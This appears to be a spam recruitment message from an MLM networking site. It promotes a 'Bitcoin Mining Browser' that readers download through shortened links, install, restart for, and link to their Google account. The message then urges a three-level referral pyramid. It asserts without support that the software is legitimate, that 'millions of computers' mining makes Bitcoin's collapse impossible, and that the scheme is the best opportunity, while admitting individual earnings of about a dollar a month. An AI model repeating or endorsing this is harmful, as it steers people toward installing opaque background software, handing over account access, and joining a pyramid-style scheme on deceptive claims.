Hi, Thanks for being my connection on MLM Gateway.
I am writing you this message in order to share my personal experiences for making money online.
I have been in an online business since 1995 and had been using various techniques to earn handsome income using Internet. One of the profitable businesses I found was creating website and monetize it with Google Adsense. I had been using this technique till 2012. After I shifted to android app development and developed more than 100 apps and monetized it with Google AdMob. But Google is very strict, and a small blunder will make your account banned. But it was the blessings of Google on me that they never close my account which might result in losing my money due to account closure. For any blunder they just stopped displaying ads on my website or mobile app.
Earning with Google Adsense or Admob is great and profitable as compared to other platforms. But earning money with websites and mobile apps is more than full time work and is also full of stresses. Last year I decided to find any business which requires me to work hard at the start, and make me relaxed and stress free along with increase in my earnings, as the time passes. I tried to earn as an affiliate of various websites by promoting my affiliate links using different traffic exchanges, email lists or paid ads. I also tried Neobux earning method by purchasing active referrals but nothing was long term. Last year in 2019, I started to research on Bitcoin which is a digital or cryptocurrency and became astonished looking at the current market price of this digital currency as follows:

Yes U$D 3924 means 1 Bitcoin is equal to 3924 U$D. It was amazing for me.
I prior did some research about Bitcoin in 2014 and 2015, the price of Bitcoin at the start of 2014 was U$D 750 and the highest was U$D 1000 during 2014. That was impressive for me because at the time when Bitcoin started in 2010 it was worth U$D 0.003. As this was my first year of proper research on Bitcoin, I decided to wait for its price index in 2015. The highest price of Bitcoin was U$D 504 in 2015. So I stopped researching on it as at that time I was not encouraged to buy Bitcoin for investment purposes.
I thought if I would have purchased 2 Bitcoins at that time when Bitcoin was at its minimum price index of U$D 340 in 2014, how I would have earned. The main reason Bitcoin not dead is that anybody can mine it and generate Bitcoin for himself/herself. This is the reason that still it will not die in the coming couple of years. I decided to earn Bitcoin by Mining and it was also the safest way to have Bitcoin because you would be mining Bitcoin instead of putting money in it. That time (i.e. at the end of 2019), it costs around U$D 5600 to mine each bitcoin, and with prices circling U$D 8,000, miners can expect a U$D 2,400 return. That was impressive but still I was not convinced to invest U$D 5600 in mining Bitcoin.
Now the central idea of the above story is Bitcoin is worth if you get it by mining without having to invest money in Mining Machine and Electricity overheads.
What an idea it is!
The current price index in 2020 of Bitcoin is as follows:

At the start of 2020, Bitcoin price was U$D 7168 and the highest price is U$D 10421. Right now the Bitcoin price is U$D 9665.
So now the perfect plan I implemented to Mine Bitcoin without having to invest even U$D 0.0000000001 is:
- Get your Bitcoin Mining Browser from here: http://clik.pw/mir3n
- Install the Browser
- After Install Restart your Computer (It is important!)
- After your computer is rebooted, start the Browser and click on the following icon (found in the icons list on upper right corner of the browser) (Important!):
- Click on the following icon and click LOGIN and link your Google Account in order to save your Income. (It is very important!):
- Done. Keep this browser on and use your PC as usual, it will keep mining Bitcoins for you in the background.
The mining screen will look like this:
You can adjust the slider for keeping Mining OFF or ON at Medium or Max Speed.
This is the safest way to mine Bitcoin without Investment. You can also browse through BLOCKCHAIN payments they actually send to their users as proof.
This Browser is being referred by a lot of Internet Entrepreneurs so you don’t have to be worried about its legitimateness. When your balances reaches 0.00001 BTC (equals to U$D 0.096), you can withdraw your earning in your Bitcoin Wallet.
If you do not have Bitcoin Wallet, please create it from here: http://clik.pw/3oVr3
Your own earnings will be U$D 0.48 to U$D 1.44 per month.
So will this be profitable? Absolutely no! But the game begins now:
To maximize your earnings with this Browser you will have to place 3 active Referrals under you. And tell these referrals to put 3 referrals each under them as well and so on. You are done.
To refer this browser to other people, get your referral link from the mining page:

This Browser also calculates and shows your estimated income potential, but in actual what my earnings will be under my PC mining speed and under my referrals PC mining speed is as follows:
TIP for more earning:
- The best Desktop PC for this Bitcoin Mining Browser is Intel-I5 (I-7 is excellent) with 8GB of RAM which Mines at the mining speed of more than 125 H/s (I recommend you to use I-5 / I-7 desktop PC for mining Bitcoin for yourself and you also recommend the same to your referrals for great earning potential)
- Laptop not recommended but can be used because I-5 Laptop does not reach even 100 H/s of Mining speed
Nobody will give you easy money. But as per my 25 years experience of online working, this opportunity is really the best. This Browser will never let Bitcoin die because when millions of computers would be mining Bitcoin, how this currency will lose its worth and die (absolutely impossible!).
They have also Mobile App for mining Bitcoin. Just train your 3 referrals actively and help them in starting this work and they will follow the same plan like you follow and nothing will stop you to earn such a good and potential income. If you have any trouble, do not hesitate to contact me because your success will be mine.
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